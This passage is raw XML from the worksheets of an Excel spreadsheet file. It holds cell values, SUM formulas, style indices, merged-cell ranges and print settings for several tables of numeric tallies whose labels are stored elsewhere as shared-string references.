      <c r="G10" s="110">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="H10" s="13"/>
      <c r="I10" s="13"/>
      <c r="J10" s="110">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K10" s="13"/>
      <c r="L10" s="13"/>
      <c r="M10" s="110">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="N10" s="13"/>
      <c r="O10" s="13"/>
      <c r="P10" s="13"/>
      <c r="Q10" s="71">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="R10" s="16"/>
    </row>
    <row r="11" spans="1:18" ht="16.5" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B11" s="109">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C11" s="109">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D11" s="109">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E11" s="13"/>
      <c r="F11" s="13"/>
      <c r="G11" s="110">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="H11" s="13"/>
      <c r="I11" s="13"/>
      <c r="J11" s="110">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K11" s="13"/>
      <c r="L11" s="13"/>
      <c r="M11" s="110">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="N11" s="13"/>
      <c r="O11" s="13"/>
      <c r="P11" s="13"/>
      <c r="Q11" s="71">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="R11" s="16"/>
    </row>
    <row r="12" spans="1:18" ht="16.5" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B12" s="109">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C12" s="109">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D12" s="109">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E12" s="13"/>
      <c r="F12" s="13"/>
      <c r="G12" s="110">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="H12" s="13"/>
      <c r="I12" s="13"/>
      <c r="J12" s="110">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K12" s="13"/>
      <c r="L12" s="13"/>
      <c r="M12" s="110">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="N12" s="13"/>
      <c r="O12" s="13"/>
      <c r="P12" s="13"/>
      <c r="Q12" s="71">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="R12" s="16"/>
    </row>
    <row r="13" spans="1:18" ht="16.5" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B13" s="109">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C13" s="109">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D13" s="109">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E13" s="13"/>
      <c r="F13" s="13"/>
      <c r="G13" s="110">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="H13" s="13"/>
      <c r="I13" s="13"/>
      <c r="J13" s="110">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K13" s="13"/>
      <c r="L13" s="13"/>
      <c r="M13" s="110">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="N13" s="13"/>
      <c r="O13" s="13"/>
      <c r="P13" s="13"/>
      <c r="Q13" s="71">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="R13" s="16"/>
    </row>
    <row r="14" spans="1:18" ht="16.5" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B14" s="109">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C14" s="109">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D14" s="109">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E14" s="13"/>
      <c r="F14" s="13"/>
      <c r="G14" s="110">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="H14" s="13"/>
      <c r="I14" s="13"/>
      <c r="J14" s="110">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K14" s="13"/>
      <c r="L14" s="13"/>
      <c r="M14" s="110">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="N14" s="13"/>
      <c r="O14" s="13"/>
      <c r="P14" s="13"/>
      <c r="Q14" s="71">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="R14" s="16"/>
    </row>
    <row r="15" spans="1:18" ht="16.5" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B15" s="109">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C15" s="109">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D15" s="109">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E15" s="13"/>
      <c r="F15" s="13"/>
      <c r="G15" s="110">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="H15" s="13"/>
      <c r="I15" s="13"/>
      <c r="J15" s="110">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K15" s="13"/>
      <c r="L15" s="13"/>
      <c r="M15" s="110">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="N15" s="13"/>
      <c r="O15" s="13"/>
      <c r="P15" s="13"/>
      <c r="Q15" s="71">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="R15" s="16"/>
    </row>
    <row r="16" spans="1:18" ht="16.5" customHeight="1">
      <c r="A16" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B16" s="109">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C16" s="109">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D16" s="109">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E16" s="13"/>
      <c r="F16" s="13"/>
      <c r="G16" s="110">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="H16" s="13"/>
      <c r="I16" s="13"/>
      <c r="J16" s="110">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K16" s="13"/>
      <c r="L16" s="13"/>
      <c r="M16" s="110">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="N16" s="13"/>
      <c r="O16" s="13"/>
      <c r="P16" s="13"/>
      <c r="Q16" s="71">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="R16" s="16"/>
    </row>
    <row r="17" spans="1:18" ht="16.5" customHeight="1">
      <c r="A17" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B17" s="109">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C17" s="109">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D17" s="109">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E17" s="13"/>
      <c r="F17" s="13"/>
      <c r="G17" s="110">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="H17" s="13"/>
      <c r="I17" s="13"/>
      <c r="J17" s="110">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K17" s="13"/>
      <c r="L17" s="13"/>
      <c r="M17" s="110">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="N17" s="13"/>
      <c r="O17" s="13"/>
      <c r="P17" s="13"/>
      <c r="Q17" s="71">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="R17" s="16"/>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="11">
    <mergeCell ref="A1:E1"/>
    <mergeCell ref="N4:N5"/>
    <mergeCell ref="B3:M3"/>
    <mergeCell ref="A3:A5"/>
    <mergeCell ref="H4:J4"/>
    <mergeCell ref="K4:M4"/>
    <mergeCell ref="N3:Q3"/>
    <mergeCell ref="O4:O5"/>
    <mergeCell ref="P4:P5"/>
    <mergeCell ref="Q4:Q5"/>
    <mergeCell ref="P2:Q2"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="1.141732283464567" right="0.35433070866141736" top="0.5511811023622047" bottom="0.5511811023622047" header="0.5118110236220472" footer="0.5118110236220472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zoomScalePageLayoutView="0" workbookViewId="0" topLeftCell="A1">
      <pane ySplit="4" topLeftCell="A5" activePane="bottomLeft" state="frozen"/>
      <selection pane="topLeft" activeCell="B28" sqref="B28:B29"/>
      <selection pane="bottomLeft" activeCell="A2" sqref="A2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="20.25" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="6.625" style="1" customWidth="1"/>
    <col min="2" max="11" width="10.125" style="1" customWidth="1"/>
    <col min="12" max="12" width="6.375" style="1" customWidth="1"/>
    <col min="13" max="16384" width="9.00390625" style="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:12" ht="20.25" customHeight="1">
      <c r="A1" s="10" t="s">
        <v>426</v>
      </c>
      <c r="B1" s="10"/>
      <c r="C1" s="10"/>
      <c r="D1" s="5"/>
      <c r="E1" s="5"/>
      <c r="F1" s="5"/>
      <c r="G1" s="5"/>
      <c r="H1" s="5"/>
      <c r="I1" s="5"/>
      <c r="J1" s="5"/>
      <c r="K1" s="5"/>
      <c r="L1" s="5"/>
    </row>
    <row r="2" spans="1:12" ht="20.25" customHeight="1">
      <c r="A2" s="10"/>
      <c r="B2" s="10"/>
      <c r="C2" s="10"/>
      <c r="D2" s="5"/>
      <c r="E2" s="5"/>
      <c r="F2" s="5"/>
      <c r="G2" s="5"/>
      <c r="H2" s="5"/>
      <c r="I2" s="5"/>
      <c r="J2" s="181" t="s">
        <v>330</v>
      </c>
      <c r="K2" s="181"/>
      <c r="L2" s="5"/>
    </row>
    <row r="3" spans="1:13" ht="20.25" customHeight="1">
      <c r="A3" s="62" t="s">
        <v>178</v>
      </c>
      <c r="B3" s="62" t="s">
        <v>0</v>
      </c>
      <c r="C3" s="62" t="s">
        <v>33</v>
      </c>
      <c r="D3" s="62" t="s">
        <v>1</v>
      </c>
      <c r="E3" s="62" t="s">
        <v>2</v>
      </c>
      <c r="F3" s="62" t="s">
        <v>3</v>
      </c>
      <c r="G3" s="62" t="s">
        <v>4</v>
      </c>
      <c r="H3" s="62" t="s">
        <v>5</v>
      </c>
      <c r="I3" s="62" t="s">
        <v>6</v>
      </c>
      <c r="J3" s="62" t="s">
        <v>7</v>
      </c>
      <c r="K3" s="62" t="s">
        <v>8</v>
      </c>
      <c r="L3" s="2"/>
      <c r="M3" s="2"/>
    </row>
    <row r="4" spans="1:11" ht="18" customHeight="1">
      <c r="A4" s="54" t="s">
        <v>10</v>
      </c>
      <c r="B4" s="65">
        <f aca="true" t="shared" si="0" ref="B4:K4">SUM(B5:B15)</f>
        <v>0</v>
      </c>
      <c r="C4" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="D4" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="E4" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="F4" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G4" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="H4" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="I4" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J4" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="K4" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="5" spans="1:11" ht="18" customHeight="1">
      <c r="A5" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B5" s="71">
        <f>SUM(C5:K5)</f>
        <v>0</v>
      </c>
      <c r="C5" s="13"/>
      <c r="D5" s="13"/>
      <c r="E5" s="13"/>
      <c r="F5" s="13"/>
      <c r="G5" s="13"/>
      <c r="H5" s="13"/>
      <c r="I5" s="13"/>
      <c r="J5" s="13"/>
      <c r="K5" s="13"/>
    </row>
    <row r="6" spans="1:11" ht="18" customHeight="1">
      <c r="A6" s="134" t="s">
        <v>383</v>
      </c>
      <c r="B6" s="71">
        <f aca="true" t="shared" si="1" ref="B6:B15">SUM(C6:K6)</f>
        <v>0</v>
      </c>
      <c r="C6" s="13"/>
      <c r="D6" s="13"/>
      <c r="E6" s="13"/>
      <c r="F6" s="13"/>
      <c r="G6" s="13"/>
      <c r="H6" s="13"/>
      <c r="I6" s="13"/>
      <c r="J6" s="13"/>
      <c r="K6" s="13"/>
    </row>
    <row r="7" spans="1:11" ht="18" customHeight="1">
      <c r="A7" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B7" s="71">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C7" s="13"/>
      <c r="D7" s="13"/>
      <c r="E7" s="13"/>
      <c r="F7" s="13"/>
      <c r="G7" s="13"/>
      <c r="H7" s="13"/>
      <c r="I7" s="13"/>
      <c r="J7" s="13"/>
      <c r="K7" s="13"/>
    </row>
    <row r="8" spans="1:11" ht="18" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B8" s="71">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C8" s="13"/>
      <c r="D8" s="13"/>
      <c r="E8" s="13"/>
      <c r="F8" s="13"/>
      <c r="G8" s="13"/>
      <c r="H8" s="13"/>
      <c r="I8" s="13"/>
      <c r="J8" s="13"/>
      <c r="K8" s="13"/>
    </row>
    <row r="9" spans="1:11" ht="18" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B9" s="71">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C9" s="13"/>
      <c r="D9" s="13"/>
      <c r="E9" s="13"/>
      <c r="F9" s="13"/>
      <c r="G9" s="13"/>
      <c r="H9" s="13"/>
      <c r="I9" s="13"/>
      <c r="J9" s="13"/>
      <c r="K9" s="13"/>
    </row>
    <row r="10" spans="1:11" ht="18" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B10" s="71">
        <f t="shared" si="1"/>
        <v>0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customHeight="1">
      <c r="A11" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B11" s="71">
        <f t="shared" si="1"/>
        <v>0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8" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B12" s="71">
        <f t="shared" si="1"/>
        <v>0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8" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B13" s="71">
        <f t="shared" si="1"/>
        <v>0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8" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B14" s="71">
        <f t="shared" si="1"/>
        <v>0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8" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B15" s="71">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C15" s="13"/>
      <c r="D15" s="13"/>
      <c r="E15" s="13"/>
      <c r="F15" s="13"/>
      <c r="G15" s="13"/>
      <c r="H15" s="13"/>
      <c r="I15" s="13"/>
      <c r="J15" s="13"/>
      <c r="K15" s="13"/>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="1">
    <mergeCell ref="J2:K2"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="1.141732283464567" right="0.7480314960629921" top="0.984251968503937" bottom="0.62992125984251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pane ySplit="4" topLeftCell="A5" activePane="bottomLeft" state="frozen"/>
      <selection pane="topLeft" activeCell="B28" sqref="B28:B29"/>
      <selection pane="bottomLeft" activeCell="A1" sqref="A1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="7.125" style="0" customWidth="1"/>
    <col min="2" max="2" width="9.875" style="0" customWidth="1"/>
    <col min="3" max="9" width="9.625" style="0" customWidth="1"/>
    <col min="10" max="13" width="8.625" style="0" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:13" ht="14.25">
      <c r="A1" s="78" t="s">
        <v>314</v>
      </c>
      <c r="B1" s="78"/>
      <c r="C1" s="78"/>
      <c r="D1" s="78"/>
      <c r="E1" s="15"/>
      <c r="F1" s="15"/>
      <c r="G1" s="15"/>
      <c r="H1" s="15"/>
      <c r="I1" s="15"/>
      <c r="J1" s="15"/>
      <c r="K1" s="15"/>
      <c r="L1" s="15"/>
      <c r="M1" s="15"/>
    </row>
    <row r="2" spans="1:13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8" t="s">
        <v>325</v>
      </c>
      <c r="M2" s="158"/>
    </row>
    <row r="3" spans="1:13" ht="18" customHeight="1">
      <c r="A3" s="50" t="s">
        <v>177</v>
      </c>
      <c r="B3" s="50" t="s">
        <v>0</v>
      </c>
      <c r="C3" s="51" t="s">
        <v>57</v>
      </c>
      <c r="D3" s="51" t="s">
        <v>58</v>
      </c>
      <c r="E3" s="51" t="s">
        <v>49</v>
      </c>
      <c r="F3" s="50" t="s">
        <v>50</v>
      </c>
      <c r="G3" s="50" t="s">
        <v>51</v>
      </c>
      <c r="H3" s="50" t="s">
        <v>52</v>
      </c>
      <c r="I3" s="50" t="s">
        <v>53</v>
      </c>
      <c r="J3" s="50" t="s">
        <v>54</v>
      </c>
      <c r="K3" s="50" t="s">
        <v>55</v>
      </c>
      <c r="L3" s="50" t="s">
        <v>56</v>
      </c>
      <c r="M3" s="50" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="4" spans="1:13" ht="18" customHeight="1">
      <c r="A4" s="54" t="s">
        <v>10</v>
      </c>
      <c r="B4" s="53">
        <f aca="true" t="shared" si="0" ref="B4:M4">SUM(B5:B15)</f>
        <v>16806</v>
      </c>
      <c r="C4" s="53">
        <f t="shared" si="0"/>
        <v>824</v>
      </c>
      <c r="D4" s="53">
        <f t="shared" si="0"/>
        <v>1083</v>
      </c>
      <c r="E4" s="53">
        <f t="shared" si="0"/>
        <v>1223</v>
      </c>
      <c r="F4" s="53">
        <f t="shared" si="0"/>
        <v>1153</v>
      </c>
      <c r="G4" s="53">
        <f t="shared" si="0"/>
        <v>1333</v>
      </c>
      <c r="H4" s="53">
        <f t="shared" si="0"/>
        <v>3374</v>
      </c>
      <c r="I4" s="53">
        <f t="shared" si="0"/>
        <v>3123</v>
      </c>
      <c r="J4" s="53">
        <f t="shared" si="0"/>
        <v>1236</v>
      </c>
      <c r="K4" s="53">
        <f t="shared" si="0"/>
        <v>758</v>
      </c>
      <c r="L4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="M4" s="53">
        <f t="shared" si="0"/>
        <v>2699</v>
      </c>
    </row>
    <row r="5" spans="1:14" ht="18" customHeight="1">
      <c r="A5" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B5" s="82">
        <f>SUM(C5:M5)</f>
        <v>2071</v>
      </c>
      <c r="C5" s="23">
        <v>90</v>
      </c>
      <c r="D5" s="23">
        <v>95</v>
      </c>
      <c r="E5" s="23">
        <v>165</v>
      </c>
      <c r="F5" s="23">
        <v>177</v>
      </c>
      <c r="G5" s="23">
        <v>136</v>
      </c>
      <c r="H5" s="23">
        <v>635</v>
      </c>
      <c r="I5" s="23">
        <v>211</v>
      </c>
      <c r="J5" s="23">
        <v>0</v>
      </c>
      <c r="K5" s="23">
        <v>0</v>
      </c>
      <c r="L5" s="23">
        <v>0</v>
      </c>
      <c r="M5" s="23">
        <v>562</v>
      </c>
      <c r="N5" s="136">
        <v>2071</v>
      </c>
    </row>
    <row r="6" spans="1:14" ht="18" customHeight="1">
      <c r="A6" s="134" t="s">
        <v>383</v>
      </c>
      <c r="B6" s="82">
        <f aca="true" t="shared" si="1" ref="B6:B15">SUM(C6:M6)</f>
        <v>371</v>
      </c>
      <c r="C6" s="23">
        <v>19</v>
      </c>
      <c r="D6" s="23">
        <v>11</v>
      </c>
      <c r="E6" s="23">
        <v>111</v>
      </c>
      <c r="F6" s="23">
        <v>0</v>
      </c>
      <c r="G6" s="23">
        <v>47</v>
      </c>
      <c r="H6" s="23">
        <v>183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136">
        <v>371</v>
      </c>
    </row>
    <row r="7" spans="1:14" ht="18" customHeight="1">
      <c r="A7" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B7" s="82">
        <f t="shared" si="1"/>
        <v>458</v>
      </c>
      <c r="C7" s="23">
        <v>53</v>
      </c>
      <c r="D7" s="23">
        <v>40</v>
      </c>
      <c r="E7" s="23">
        <v>68</v>
      </c>
      <c r="F7" s="23">
        <v>67</v>
      </c>
      <c r="G7" s="23">
        <v>86</v>
      </c>
      <c r="H7" s="23">
        <v>144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136">
        <v>458</v>
      </c>
    </row>
    <row r="8" spans="1:14" ht="18" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B8" s="82">
        <f t="shared" si="1"/>
        <v>888</v>
      </c>
      <c r="C8" s="23">
        <v>80</v>
      </c>
      <c r="D8" s="23">
        <v>129</v>
      </c>
      <c r="E8" s="23">
        <v>123</v>
      </c>
      <c r="F8" s="23">
        <v>99</v>
      </c>
      <c r="G8" s="23">
        <v>85</v>
      </c>
      <c r="H8" s="23">
        <v>127</v>
      </c>
      <c r="I8" s="23">
        <v>245</v>
      </c>
      <c r="J8" s="23"/>
      <c r="K8" s="23"/>
      <c r="L8" s="23"/>
      <c r="M8" s="23"/>
      <c r="N8" s="136">
        <v>888</v>
      </c>
    </row>
    <row r="9" spans="1:14" ht="18" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B9" s="82">
        <f t="shared" si="1"/>
        <v>2449</v>
      </c>
      <c r="C9" s="23">
        <v>115</v>
      </c>
      <c r="D9" s="23">
        <v>106</v>
      </c>
      <c r="E9" s="23">
        <v>176</v>
      </c>
      <c r="F9" s="23">
        <v>69</v>
      </c>
      <c r="G9" s="23">
        <v>135</v>
      </c>
      <c r="H9" s="23">
        <v>407</v>
      </c>
      <c r="I9" s="23">
        <v>700</v>
      </c>
      <c r="J9" s="23">
        <v>741</v>
      </c>
      <c r="K9" s="23"/>
      <c r="L9" s="23"/>
      <c r="M9" s="23"/>
      <c r="N9" s="136">
        <v>2449</v>
      </c>
    </row>
    <row r="10" spans="1:14" ht="18" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B10" s="82">
        <f t="shared" si="1"/>
        <v>606</v>
      </c>
      <c r="C10" s="23">
        <v>85</v>
      </c>
      <c r="D10" s="23">
        <v>118</v>
      </c>
      <c r="E10" s="23">
        <v>105</v>
      </c>
      <c r="F10" s="23">
        <v>68</v>
      </c>
      <c r="G10" s="23">
        <v>43</v>
      </c>
      <c r="H10" s="23">
        <v>187</v>
      </c>
      <c r="I10" s="23"/>
      <c r="J10" s="23"/>
      <c r="K10" s="23"/>
      <c r="L10" s="23"/>
      <c r="M10" s="23"/>
      <c r="N10" s="136">
        <v>606</v>
      </c>
    </row>
    <row r="11" spans="1:14" ht="18" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B11" s="82">
        <f t="shared" si="1"/>
        <v>1829</v>
      </c>
      <c r="C11" s="23">
        <v>51</v>
      </c>
      <c r="D11" s="23">
        <v>78</v>
      </c>
      <c r="E11" s="23">
        <v>101</v>
      </c>
      <c r="F11" s="23">
        <v>129</v>
      </c>
      <c r="G11" s="23">
        <v>87</v>
      </c>
      <c r="H11" s="23">
        <v>361</v>
      </c>
      <c r="I11" s="23">
        <v>655</v>
      </c>
      <c r="J11" s="26"/>
      <c r="K11" s="23">
        <v>367</v>
      </c>
      <c r="L11" s="23"/>
      <c r="M11" s="23"/>
      <c r="N11" s="136">
        <v>1829</v>
      </c>
    </row>
    <row r="12" spans="1:14" ht="18" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B12" s="82">
        <f t="shared" si="1"/>
        <v>2359</v>
      </c>
      <c r="C12" s="23">
        <v>109</v>
      </c>
      <c r="D12" s="23">
        <v>151</v>
      </c>
      <c r="E12" s="23">
        <v>126</v>
      </c>
      <c r="F12" s="23">
        <v>238</v>
      </c>
      <c r="G12" s="23">
        <v>287</v>
      </c>
      <c r="H12" s="23">
        <v>513</v>
      </c>
      <c r="I12" s="23">
        <v>935</v>
      </c>
      <c r="J12" s="23">
        <v>0</v>
      </c>
      <c r="K12" s="23">
        <v>0</v>
      </c>
      <c r="L12" s="23">
        <v>0</v>
      </c>
      <c r="M12" s="23">
        <v>0</v>
      </c>
      <c r="N12" s="136">
        <v>2359</v>
      </c>
    </row>
    <row r="13" spans="1:14" ht="18" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B13" s="82">
        <f t="shared" si="1"/>
        <v>691</v>
      </c>
      <c r="C13" s="23">
        <v>89</v>
      </c>
      <c r="D13" s="23">
        <v>78</v>
      </c>
      <c r="E13" s="23">
        <v>88</v>
      </c>
      <c r="F13" s="23">
        <v>37</v>
      </c>
      <c r="G13" s="23">
        <v>169</v>
      </c>
      <c r="H13" s="23">
        <v>109</v>
      </c>
      <c r="I13" s="23">
        <v>121</v>
      </c>
      <c r="J13" s="23"/>
      <c r="K13" s="23"/>
      <c r="L13" s="23"/>
      <c r="M13" s="23"/>
      <c r="N13" s="136">
        <v>691</v>
      </c>
    </row>
    <row r="14" spans="1:14" ht="18" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B14" s="82">
        <f t="shared" si="1"/>
        <v>3142</v>
      </c>
      <c r="C14" s="23">
        <v>100</v>
      </c>
      <c r="D14" s="23">
        <v>196</v>
      </c>
      <c r="E14" s="23">
        <v>111</v>
      </c>
      <c r="F14" s="23">
        <v>232</v>
      </c>
      <c r="G14" s="23">
        <v>218</v>
      </c>
      <c r="H14" s="23">
        <v>570</v>
      </c>
      <c r="I14" s="23">
        <v>256</v>
      </c>
      <c r="J14" s="23">
        <v>495</v>
      </c>
      <c r="K14" s="23">
        <v>391</v>
      </c>
      <c r="L14" s="23">
        <v>0</v>
      </c>
      <c r="M14" s="23">
        <v>573</v>
      </c>
      <c r="N14" s="136">
        <v>3142</v>
      </c>
    </row>
    <row r="15" spans="1:14" ht="18" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B15" s="82">
        <f t="shared" si="1"/>
        <v>1942</v>
      </c>
      <c r="C15" s="23">
        <v>33</v>
      </c>
      <c r="D15" s="23">
        <v>81</v>
      </c>
      <c r="E15" s="23">
        <v>49</v>
      </c>
      <c r="F15" s="23">
        <v>37</v>
      </c>
      <c r="G15" s="23">
        <v>40</v>
      </c>
      <c r="H15" s="23">
        <v>138</v>
      </c>
      <c r="I15" s="23">
        <v>0</v>
      </c>
      <c r="J15" s="23">
        <v>0</v>
      </c>
      <c r="K15" s="23">
        <v>0</v>
      </c>
      <c r="L15" s="23">
        <v>0</v>
      </c>
      <c r="M15" s="23">
        <v>1564</v>
      </c>
      <c r="N15" s="136">
        <v>1942</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="1">
    <mergeCell ref="L2:M2"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="0.7480314960629921" right="0.35433070866141736" top="0.984251968503937" bottom="0.5905511811023623" header="0.5118110236220472" footer="0.5118110236220472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zoomScalePageLayoutView="0" workbookViewId="0" topLeftCell="A1">
      <pane ySplit="4" topLeftCell="A5" activePane="bottomLeft" state="frozen"/>
      <selection pane="topLeft" activeCell="B28" sqref="B28:B29"/>
      <selection pane="bottomLeft" activeCell="A2" sqref="A2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="20.25" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="6.50390625" style="1" customWidth="1"/>
    <col min="2" max="11" width="9.75390625" style="1" customWidth="1"/>
    <col min="12" max="12" width="6.375" style="1" customWidth="1"/>
    <col min="13" max="16384" width="9.00390625" style="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:12" ht="20.25" customHeight="1">
      <c r="A1" s="75" t="s">
        <v>427</v>
      </c>
      <c r="B1" s="75"/>
      <c r="C1" s="75"/>
      <c r="D1" s="75"/>
      <c r="E1" s="6"/>
      <c r="F1" s="6"/>
      <c r="G1" s="6"/>
      <c r="H1" s="6"/>
      <c r="I1" s="6"/>
      <c r="J1" s="6"/>
      <c r="K1" s="6"/>
      <c r="L1" s="6"/>
    </row>
    <row r="2" spans="1:12" ht="20.25" customHeight="1">
      <c r="A2" s="75"/>
      <c r="B2" s="75"/>
      <c r="C2" s="75"/>
      <c r="D2" s="75"/>
      <c r="E2" s="6"/>
      <c r="F2" s="6"/>
      <c r="G2" s="6"/>
      <c r="H2" s="6"/>
      <c r="I2" s="6"/>
      <c r="J2" s="207" t="s">
        <v>331</v>
      </c>
      <c r="K2" s="207"/>
      <c r="L2" s="6"/>
    </row>
    <row r="3" spans="1:13" ht="20.25" customHeight="1">
      <c r="A3" s="62" t="s">
        <v>178</v>
      </c>
      <c r="B3" s="62" t="s">
        <v>0</v>
      </c>
      <c r="C3" s="62" t="s">
        <v>33</v>
      </c>
      <c r="D3" s="62" t="s">
        <v>1</v>
      </c>
      <c r="E3" s="62" t="s">
        <v>2</v>
      </c>
      <c r="F3" s="62" t="s">
        <v>3</v>
      </c>
      <c r="G3" s="62" t="s">
